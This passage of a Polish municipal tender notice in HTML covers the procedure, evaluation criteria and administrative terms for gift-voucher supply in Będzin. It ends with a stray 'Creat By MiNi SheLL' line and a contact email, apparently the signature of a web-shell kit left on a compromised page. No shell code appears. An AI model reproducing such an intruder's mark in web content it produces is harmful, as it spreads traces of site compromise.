3) Wykaz placówek realizujących bony towarowe na terenie gminy miejskiej Będzin, zgodnie z wymaganiami Zamawiającego, o którym mowa w Rozdziale IV ust. 4 pkt 7 (w związku z Rozdziałem IV ust. 5) SIWZ, wypełniony w oparciu o wzór stanowiący załącznik nr 5 do SIWZ - w przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, wykaz wypełnia co najmniej jeden z tych Wykonawców albo wszyscy Ci Wykonawcy wspólnie.
Wyżej wymienione dokumenty muszą zostać złożone przez Wykonawcę 
wraz z ofertą, a nie w wyznaczonym przez Zamawiającego terminie, 
nie krótszym niż 5 dni.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>20</td></tr><tr><td>Ilość punktów realizujących bony towarowe na terenie gminy Będzin niebędących dyskontami handlowymi lub supermarketami</td><td>40</td></tr><tr><td>Ilość dyskontów handlowych lub supermarketów realizujących bony towarowe  na terenie gminy Będzin</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami określonymi we wzorze umowy, stanowiącym załącznik nr 6 do SIWZ.Zmiana umowy może także nastąpić w przypadkach, 
o których mowa w art. 144 ust. 1 pkt 2-6 ustawy.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części niniejszego zamówienia, wobec czego Zamawiający 
nie dokonuje takiego zastrzeżenia, zgodnie z art. 36a ust. 2 ustawy.
2. Zamawiający nie określa wymagań, o których mowa w art. 29 ust. 3a ustawy,
to jest Zamawiający nie wprowadza wymogu, by Wykonawca lub Podwykonawca 
w celu realizacji przedmiotu niniejszego zamówienia zatrudniał na podstawie umowy o pracę osoby wykonujące czynności w zakresie realizacji niniejszego zamówienia,gdyż wykonywanie tych czynności nie polega na wykonywaniu pracy 
w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (tekst jednolity:Dz. U. z 2014 r., poz. 1502 ze zm.). Przedmiotem niniejszego zamówienia są bowiem okresowe dostawy bonów towarowych, a ich dostawa dokonywana będzie Zamawiającemu na zasadach określonych w Rozdziale II ust. 7 SIWZ. Zamawiający przypomina, że w przypadku wykonywania przedmiotu niniejszego zamówienia przez osoby zatrudnione u Wykonawcy na podstawie umowy o pracę, płaca minimalna takich osób nie może być niższa niż minimalne wynagrodzenie określone w rozporządzeniu Rady Ministrów z dnia 9 września 2016 r., w sprawie wysokości minimalnego wynagrodzenia za pracę w 2017 r. (Dz. U. z 2016 r., poz. 1456), to jest nie może być niższa niż 2000,00 zł. W przypadku natomiast wykonywania przedmiotu niniejszego zamówienia przez osoby zatrudnione u Wykonawcy na podstawie umowy cywilnoprawnej, minimalna stawka godzinowa takich osób nie może być niższa niż minimalna stawka godzinowa określona w Obwieszczeniu Prezesa Rady Ministrów z dnia 21 września 2016 r. (Monitor Polski 2016 r., poz.934), 
to jest nie może być niższa niż 13 zł za każdą godzinę świadczenia usługi objętej przedmiotem niniejszego zamówienia.
3. Zamawiający nie określa wymagań związanych z realizacją zamówienia dotyczących aspektów gospodarczych, środowiskowych, społecznych, związanych z innowacyjnością lub zatrudnieniem, o których mowa w art. 29 ust. 4 ustawy.
4. Zamawiający nie określa standardów jakościowych, o których mowa w art. 91 ust. 2a ustawy, ponieważ kryterium ceny nie stanowi jedynego kryterium oceny ofert w niniejszym postępowaniu, a wartość kryterium ceny nie przekracza 
60 %.</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com